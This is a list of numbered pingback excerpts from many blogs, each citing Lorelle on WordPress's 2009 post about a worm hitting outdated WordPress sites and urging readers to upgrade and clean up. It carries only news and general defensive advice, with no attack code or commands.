  377. [...] Moreover, now every blogger and webmaster in the world who uses WordPress is bombarded with many posts about security this, security that, from every single wordpress developer and enthusiast. Some developers offer help (they themselves need help now). Some others are screaming to upgrade “after getting hacked” and a “LOT more” [...]

  378. [...] that nothing had been changed on the blog (at least not by me – there are reports of WordPress attacks en – pt). The first step, then, was to update WP. Nothing changed; it was not the attacks. [...]

  379. [...] I was originally made aware of this issue on Twitter, as people started spreading the word about a vicious worm that was working its way through older, non-updated installs of WordPress. So, as usual, I went surfing for some trustworthy information. The best description of what happened can be found in Lorelle’s blog. [...]

  380. [...] Hacked WordPress Installation Lorelle has a great recent compilation of how to diagnose a hacked WordPress blog, and how to fix it. I determined that what happened to my site wasn’t the new worm based [...]

  381. [...] has a great recent compilation of how to diagnose a hacked WordPress blog, and how to fix [...]

  382. [...] it won’t overwrite some of the scripts that the hackers have placed using a backdoor exploit. Read more from Lorelle on what you need to do if you have been hacked. If you’re not particularly confident digging around in the files that you can only access [...]

  383. [...] it won’t overwrite some of the scripts that the hackers have placed using a backdoor exploit. Read more from Lorelle on what you need to do if you have been hacked. If you’re not particularly confident digging around in the files that you can only access [...]

  384. [...] As a matter of precaution and courtesy, at no charge to you (and without causing alarm), I investigated all the websites in my care and found that MOST had been compromised, including my own. If you have noticed a decline in website traffic, lower page rank or your adsense earnings have dropped off just recently, then they are the direct symptoms of this initial attack. Read more at http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  385. [...] have read other reports that say it is even more widespread than that [...]

  386. [...] non-updated plugins.  I was surprised a few weeks back when I read this post on Lorelle about Old WordPress Versions Under Attack.  I thought at first that the hack she talks about was new, and it’s not – it’s [...]

  387. [...] quote Lorelle: Update your WordPress blog before you continue reading this post. That’s how critical this issue [...]

  388. [...] the recent security scare that targeted older versions of WordPress, blame is being thrown around left and right, from [...]

  389. [...] who-knows-what, resulting in broken links, back doors, compromised accounts, and so on (you can read more on this worm if that kind of thing interests [...]

  390. [...] with stories of this hack. TechCrunch has an excellent post. And Lorelle on WordPress.com has some excellent suggestions for cleaning up a blog like this [...]

  391. [...] don’t have the latest version of wordpress, NOW is the time to do it. The warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  392. [...] WordPress blog has been attacked, and how to respond to a WordPress attack. Read this blog entry, Old WordPress Versions Under Attack, at Lorelle on [...]

  393. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find out: There are strange additions to the pretty permalinks, such as [...]

  394. [...] quickly to the blog of Matt Mullenweg, the founder of WordPress, and from there to Techcrunch, then to Lorelle and from there to Journeyetc; I read and got to work. Because it's [...]

  395. [...] Lorelle on WordPress: Old WordPress Versions Under Attack Smackdown: How To Completely Clean Your Hacked WordPress Installation WordPress Blog: How to Keep [...]

  396. [...] to the newest 2.8.4 security update, just to make sure we’re safe from the newest hacker attacks (more here). It took us more than I imagined. After all the work had been done, I had to make sure everything [...]

  397. [...] Old WordPress Versions Under Attack [...]

  398. [...]  I just determined that tomorrowland.com has been infected. You can read about the attack here.  So the site might be up and down for a few days until I clean it up.  And then I’ll be on [...]

  399. [...] the current „worm“ is concerned, there are various ways to check for it. The first clue should be to look at the WordPress permalinks. If they have strange code at the end, then [...]

  400. [...] which led me to the post. It sounds like this is directly related to running older versions of WordPress (this post is a very good overview; please check it out). So, yes, upgrading is crucial, but it [...]

  401. [...] Hacked site! Blog and links disabled. Need help repairing it. Never heard of Lorelle before. Amazing link. Thanks to Phillip Barron for pointing this out. Still need help!! [...]

  402. [...] Old WordPress Versions Under Attack [...]

  403. [...] Old WordPress Versions Under Attack [...]

  404. [...] Now it’s time to get our WordPress versions updated again, just to be on the safe side. (see Lorelle’s post if you like) [...]

  405. [...] I was originally made aware of this issue on Twitter, as people started spreading the word about a vicious worm that was working its way through older, non-updated installs of WordPress. So, as usual, I went surfing for some trustworthy information. The best description of what happened can be found in Lorelle’s blog. [...]

  406. [...] went to WordPress support for suggestions, and found a few helpful links (Lorelle) (Donncha). I learned from Lorelle – btw, everyone who uses WordPress should know Lorelle! – [...]

  407. [...] recently came under heavy fire because an Internet worm ran wild and it specifically targeted older versions of WordPress. Even popular bloggers such as Robert Scoble were hit hard by the worm. This whole fiasco did not [...]

  408. [...] weird URLs with “evalbase64” in your server logs, it’s because there’s an organized attack underway against old WordPress [...]

  409. [...] update now and don’t be a Scoble. Tags:blog, [...]

  410. [...] Please update now and don’t be a Scoble. [...]

  411. [...] September 2009, a worm targeting blogs on old WordPress versions tore through the web, leaving many frustrated and crippled with hacked blogs. The simple task of [...]

  412. [...] upgraded the blog to 2.9.1 and I recommend that you do the same [...]

  413. [...] and delete the “admin” account. Given some security issues with WordPress in the past, it seems like a good piece of advice. But I won’t describe it here. I did do it in my [...]

  414. [...] update now and don’t be a Scoble. Tags:blog, Software Updates, [...]

  415. [...] Please update now and don’t be a Scoble. [...]

  416. [...] If you still run version 2.8.4 or lower you should immediately upgrade your software to the latest one available. This warning comes from Lorelle on WordPress. [...]

  417. [...] http://wordpress.org/development/2009/09/keep-wordpress-secure/ * http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ * [...]

  418. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ (@Tweetmeme first alerted me to it) [...]

  419. [...] internet worm), hacked my site, which is based on WordPress (you can read about this type of issue here). While there is no apparent damage done, some people are reporting that their virus scanners are [...]

  420. [...] As a general rule, when using WP, it is advisable to disable (if not used) the option “Enable the WordPress, Movable Type, MetaWeblog and Blogger XML-RPC publishing protocols.” in the Settings/Writing menu. Other exploits for old versions of WP are described at Old WordPress Versions Under Attack. [...]

  421. [...] Old WordPress Versions Under Attack [...]

  422. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  423. [...] A new type of attack against blogs running on WordPress has been discovered, according to Lorelle VanFossen. It affects blogs running outdated versions of WordPress (prior to 2.8.4), and the number [...]

  424. [...] news, many WordPress blogs have been attacked by hackers in the past few days and the numbers are growing by the hour. Reported by Mashable, the newest vulnerability can affect any prior version of WordPress (before [...]

  425. [...] Therefore when something happens that increases the number of people getting hacked, such as when a new exploit is discovered, or a security hole in a large host starts getting exploited (like what happened with Network [...]

  426. [...] no need to worry, because hackers cannot attack wordpress.com. The news comes from Lorelle on WordPress after it was discovered that the vicious attack exploits security holes in previous versions [...]

  427. [...] Defender – 30 Ways To Secure Your Blog From Attack Anyone Can Do Old WordPress Versions Under Attack How To Completely Clean Your Hacked WordPress Installation Did Your WordPress Site Get [...]

  428. [...] in circles ever since to get this issue resolved. It’s a server level hack, which did grow to infect my WordPress blog, which caused confusion for them as they don’t provide WordPress support (don’t get me [...]

  429. [...] You should also read an article from the WordPress CORE TEAM on why to upgrade and stuff related to that – http://lorelle.wordpress.com [...]

  430. [...] hack that has been a problem for WordPress, Drupal, Joomla, and other sites for a couple of years. I reported on this in fall of 2009 and all versions of WordPress since have been protected from this type of [...]

  431. [...] Infection and cleanup: Infections and cleanup: several bloggers have published posts explaining how to detect and clean your blog: – WordPress Hacker Stikes, How to Fix The Hack That Causes Permalinks / URL Structure Error at Kingpin SEO – 4 ways to find out if your WordPress installation has been affected by eval / base64_decode at Digitizor – Old WordPress Versions Under Attack at Lorelle [...]

  432. [...] to 2.8.4 are strongly encouraged to upgrade as soon as possible; in fact, the reports that recently circulated on the Net regarding certain vulnerabilities that [...]

  433. [...] number of scams, phishing, and malware with WordPress, specifically WordPress Themes, Plugins, and out-of-date versions of WordPress. WordPress expert, Otto of OttoPress investigated a WordPress malware hack last year, uncovering [...]

  434. [...] high profile WordPress blogs that were not updated. John Gruber over at Daring Fireball has jumped into the fray with some posts on the subject including this new one titled “How Not to Get Your Blog [...]

  435. [...] Lorelle on WordPress gives us clues to determine if your site has been attacked: There are two clues that your WordPress site has been attacked. [...]

  436. [...] vulnerable – and being hit – by a worm that affects any old (i.e. before 2.8.4) version. Details are here (and also on WordPress's site). As Matt Mullenweg, who has played a key part in the development and [...]

  437. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous [...]

  438. [...] of a mandatory security release. Don’t wait. There are evildoers just waiting for security vulnerabilities on older, out-of-date versions of WordPress, PHP, MySQL, etc. Update immediately and don’t risk your [...]

  439. [...] Old WordPress Versions Under Attack [...]

  440. [...] Old WordPress Versions Under Attack [...]

  441. […] Old WordPress Versions Under Attack […]

  442. […] as of this writing) to avoid an exploit which may place your blog or web site at risk. See the article at “Lorelle on WordPress” for more info. Either use the upgrade link on your WordPress blog’s control panel, or […]

  443. […] These sorts of nefarious requests were implicated in the September 2009 WordPress attacks. […]
